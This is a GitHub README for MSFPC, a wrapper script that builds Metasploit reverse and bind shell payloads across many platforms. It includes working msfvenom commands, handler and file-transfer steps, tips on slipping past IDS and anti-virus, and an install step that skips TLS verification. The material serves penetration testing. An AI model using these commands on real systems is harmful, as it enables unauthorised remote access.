Skip to content

madar4uch1a/msfpc

 
 

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

36 Commits
 
 
 
 
 
 

Repository files navigation

MSFvenom Payload Creator (MSFPC)

A quick way to generate various "basic" Meterpreter payloads via msfvenom (part of the Metasploit framework).

msfpc logo


About

MSFvenom Payload Creator (MSFPC) is a wrapper to generate multiple types of payloads, based on users choice. The idea is to be as simple as possible (only requiring one input) to produce their payload.

Fully automating msfvenom & Metasploit is the end goal (well as to be be able to automate MSFPC itself). The rest is to make the user's life as easy as possible (e.g. IP selection menu, msfconsole resource file/commands, batch payload production and able to enter any argument in any order (in various formats/patterns)).

The only necessary input from the user should be defining the payload they want by either the platform (e.g. windows), or the file extension they wish the payload to have (e.g. exe).

  • Can't remember your IP for a interface? Don't sweat it, just use the interface name: eth0.
  • Don't know what your external IP is? MSFPC will discover it: wan.
  • Want to generate one of each payload? No issue! Try: loop.
  • Want to mass create payloads? Everything? Or to filter your select? ..Either way, its not a problem. Try: batch (for everything), batch msf (for every Meterpreter option), batch staged (for every staged payload), or batch cmd stageless (for every stageless command prompt)!

Note: This will NOT try to bypass any anti-virus solutions at any stage.

Msfvenom Payload Creator (MSFPC)


## Install

  • Designed for Kali Linux v2.x/Rolling & Metasploit v4.11+.
  • Kali v1.x should work.
  • OSX 10.11+ should work.
  • Weakerth4n 6+ should work.
  • ...nothing else has been tested.
$ curl -k -L "https://raw.githubusercontent.com/g0tmi1k/mpc/master/msfpc.sh" > /usr/local/bin/msfpc
$ chmod 0755 /usr/local/bin/msfpc

Kali-Linux

MSFPC is already packaged in Kali Rolling, so all you have to-do is:

root@kali:~# apt install -y msfpc

## Help

$ bash msfpc.sh -h -v
 [*] MSFvenom Payload Creator (MSFPC v2.1.0)

Usage: msfpc.sh <TYPE> (<DOMAIN/IP>) (<PORT>) [OPTIONS]

<TYPE>:
  + APK
  + ASP
  + ASPX
  + Bash [.sh]
  + Java [.jsp]
  + Linux [.elf]
  + OSX [.macho]
  + Perl [.pl]
  + PHP
  + Powershell [.ps1]
  + Python [.py]
  + Tomcat [.war]
  + Windows [.exe // .dll]

Options (order doesn't matter):
  -c, --cmd               Generate command shell (instead of meterpreter)
  -m, --meterpreter       Generate meterpreter shell (default)
  -b, --bind              Use bind payload (default reverse)
  -r, --reverse           Use reverse payload
  -s, --staged            Use staged payload (default for most)
      --stageless         Use stageless payload
  -t, --tcp               Use TCP transport (default)
      --http              Use HTTP transport
      --https             Use HTTPS transport
  -f, --find-port         Use find_port transport (allports)
  -e, --encoder <enc>     Specify encoder (e.g., x86/shikata_ga_nai)
  -A, --arch <arch>       Specify payload architecture (x86, x64, armle, etc)
  -F, --format <format>   Override msfvenom output format (c, python, raw, etc)
  -o, --output <dir>      Output directory (default current)
  -a, --batch             Generate all possible combinations
  -l, --loop              Generate one of each TYPE
  -v, --verbose           Verbose output
  -h, --help              Show this help

Rather than putting <DOMAIN/IP>, you can use an interface name and MSFPC will detect that IP address.
Missing <DOMAIN/IP> will default to the IP menu.

Missing <PORT> will default to 443.

<CMD> is a standard/native command prompt/terminal to interact with.
<MSF> is a custom cross‑platform shell, gaining the full power of Metasploit.
Missing <CMD/MSF> will default to <MSF> where possible.
  Note: Metasploit doesn't (yet!) support <CMD/MSF> for every <TYPE> format.
<CMD> payloads are generally smaller than <MSF> and easier to bypass EMET; they limit post modules/scripts support.
<MSF> payloads are generally much larger than <CMD>, as they come with more features.

<BIND> opens a port on the target side, and the attacker connects to it; commonly blocked by ingress firewall rules.
<REVERSE> makes the target connect back to the attacker; the attacker must have an open port and outgoing access.
Missing <BIND/REVERSE> will default to <REVERSE>.
<BIND> allows the attacker to connect whenever desired. <REVERSE> needs the target to repeatedly connect back to maintain access.

<STAGED> splits the payload into parts, making it smaller but dependent on Metasploit.
<STAGELESS> is a complete standalone payload; more 'stable' than <STAGED>.
Missing <STAGED/STAGELESS> will default to <STAGED> where possible.
  Note: Metasploit doesn't (yet!) support <STAGED/STAGELESS> for every <TYPE> format.
<STAGED> are 'better' in low‑bandwidth/high‑latency environments.
<STAGELESS> are seen as 'stealthier' when bypassing anti‑virus protections. <STAGED> may work 'better' with IDS/IPS.
More information: https://community.rapid7.com/community/metasploit/blog/2015/03/25/stageless-meterpreter-payloads
                  https://www.offensive-security.com/metasploit-unleashed/payload-types/
                  https://www.offensive-security.com/metasploit-unleashed/payloads/

<TCP> is the standard method to connect back. This is the most compatible with TYPES as it is raw and easily detected on IDSs.
<HTTP> makes the communication appear to be HTTP traffic (unencrypted). Helpful when packet inspection limits port/protocol use.
<HTTPS> makes the communication appear to be encrypted HTTP traffic (SSL/TLS).
<FIND_PORT> will attempt every port on the target machine to find a way out; switches to 'allports' based on <TYPE>.
Missing <TCP/HTTP/HTTPS/FIND_PORT> will default to <TCP>.
Altering the transport (HTTP/HTTPS) slows communication and increases payload size.
More information: https://community.rapid7.com/community/metasploit/blog/2011/06/29/meterpreter-httphttps-communication

<BATCH> will generate as many combinations as possible: <TYPE>, <CMD + MSF>, <BIND + REVERSE>, <STAGED + STAGLESS> & <TCP + HTTP + HTTPS + FIND_PORT>
<LOOP> will just create one of each <TYPE>.

<VERBOSE> will display more information.
$

Example #1 (Windows, Fully Automated Using Manual IP)

$ bash msfpc.sh windows 192.168.1.10
 [*] MSFvenom Payload Creator (MSFPC v2.1.0)
 [i]   IP: 192.168.1.10
 [i] PORT: 443
 [i] TYPE: windows (windows/meterpreter/reverse_tcp)
 [i]  CMD: msfvenom -p windows/meterpreter/reverse_tcp -f exe \
  --platform windows -a x86 -e generic/none LHOST=192.168.1.10 LPORT=443 \
  > '/root/windows-meterpreter-staged-reverse-tcp-443.exe'

 [i] windows meterpreter created: '/root/windows-meterpreter-staged-reverse-tcp-443.exe'

 [i] MSF handler file: '/root/windows-meterpreter-staged-reverse-tcp-443-exe.rc'
 [i] Run: msfconsole -q -r '/root/windows-meterpreter-staged-reverse-tcp-443-exe.rc'
 [?] Quick web server (for file transfer)?: python2 -m SimpleHTTPServer 8080
 [*] Done!
$

Example #2 (Linux Format, Fully Automated Using Manual Interface and Port)

$ ./msfpc.sh elf bind eth0 4444 verbose
 [*] MSFvenom Payload Creator (MSFPC v2.1.0)
 [i]        IP: 192.168.103.142
 [i]      PORT: 4444
 [i]      TYPE: linux (linux/x86/shell/bind_tcp)
 [i]     SHELL: shell
 [i] DIRECTION: bind
 [i]     STAGE: staged
 [i]    METHOD: tcp
 [i]       CMD: msfvenom -p linux/x86/shell/bind_tcp -f elf \
  --platform linux -a x86 -e generic/none  LPORT=4444 \
  > '/root/linux-shell-staged-bind-tcp-4444.elf'

 [i] linux shell created: '/root/linux-shell-staged-bind-tcp-4444.elf'

 [i] File: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, corrupted section header size
 [i] Size: 4.0K
 [i]  MD5: eed4623b765eea623f2e0206b63aad61
 [i] SHA1: 0b5dabd945ef81ec9283768054b3c22125aa9185

 [i] MSF handler file: '/root/linux-shell-staged-bind-tcp-4444-elf.rc'
 [i] Run: msfconsole -q -r '/root/linux-shell-staged-bind-tcp-4444-elf.rc'
 [?] Quick web server (for file transfer)?: python2 -m SimpleHTTPServer 8080
 [*] Done!
$

Example #3 (Python Format, Interactive IP Menu)

$ msfpc stageless cmd py tcp
 [*] MSFvenom Payload Creator (MSFPC v2.1.0)

 [i] Use which interface - IP address?:
 [i]   1.) eth0 - 192.168.103.142
 [i]   2.) lo - 127.0.0.1
 [i]   3.) wan - 31.204.154.174
 [?] Select 1-3, interface or IP address: 1

 [i]   IP: 192.168.103.142
 [i] PORT: 443
 [i] TYPE: python (python/shell_reverse_tcp)
 [i]  CMD: msfvenom -p python/shell_reverse_tcp -f raw \
  --platform python -e generic/none -a python LHOST=192.168.103.142 LPORT=443 \
  > '/root/python-shell-stageless-reverse-tcp-443.py'

 [i] python shell created: '/root/python-shell-stageless-reverse-tcp-443.py'

 [i] MSF handler file: '/root/python-shell-stageless-reverse-tcp-443-py.rc'
 [i] Run: msfconsole -q -r '/root/python-shell-stageless-reverse-tcp-443-py.rc'
 [?] Quick web server (for file transfer)?: python2 -m SimpleHTTPServer 8080
 [*] Done!
$

Note: Removed WAN IP.

Example #4 (Loop - Generates one of everything)

$ ./msfpc.sh loop wan
 [*] MSFvenom Payload Creator (MSFPC v2.1.0)
 [i] Loop Mode. Creating one of each TYPE, with default values

 [*] MSFvenom Payload Creator (MSFPC v2.1.0)
 [i]   IP: xxx.xxx.xxx.xxx
 [i] PORT: 443
 [i] TYPE: android (android/meterpreter/reverse_tcp)
 [i]  CMD: msfvenom -p android/meterpreter/reverse_tcp \
  LHOST=xxx.xxx.xxx.xxx LPORT=443 \
  > '/root/android-meterpreter-stageless-reverse-tcp-443.apk'

 [i] android meterpreter created: '/root/android-meterpreter-stageless-reverse-tcp-443.apk'

 [i] MSF handler file: '/root/android-meterpreter-stageless-reverse-tcp-443-apk.rc'
 [i] Run: msfconsole -q -r '/root/android-meterpreter-stageless-reverse-tcp-443-apk.rc'
 [?] Quick web server (for file transfer)?: python2 -m SimpleHTTPServer 8080
 [*] Done!


 [*] MSFvenom Payload Creator (MSFPC v2.1.0)

...SNIP...

 [*] Done!

$

Note: Removed WAN IP.

Examples

Example #5 (x64 shellcode)

$ msfpc windows 10.0.0.1 -A x64 -F c
[*] MSFvenom Payload Creator (MSFPC v2.1.0)
[i]   IP: 10.0.0.1
[i] PORT: 443
[i] TYPE: windows/x64/meterpreter/reverse_tcp
[i]  CMD: msfvenom -p windows/x64/meterpreter/reverse_tcp -f c \
 --platform windows -a x64 LHOST=10.0.0.1 LPORT=443 \
 > '/root/windows-x64-meterpreter-reverse-tcp-443.c'

[i] shellcode saved: '/root/windows-x64-meterpreter-reverse-tcp-443.c'

[*] Done!

New features

MSFPC now supports:

  • Shellcode generation – override the output format with -F/--format (e.g. c, python, raw, etc.) to receive raw shellcode or language‑specific wrappers.
  • x64 (and other) architectures – specify -A/--arch to select payload architecture (e.g. x64, x86, armle, etc.). The payload name will be adjusted accordingly (e.g. windows/x64/meterpreter/reverse_tcp).
  • IPv6 support (work in progress)
  • Look into using OS scripting more (powershell_bind_tcp & bind_perl etc)

About

MSFvenom Payload Creator (MSFPC)

Resources

Stars

Watchers

Forks

Releases

Packages

Contributors

Languages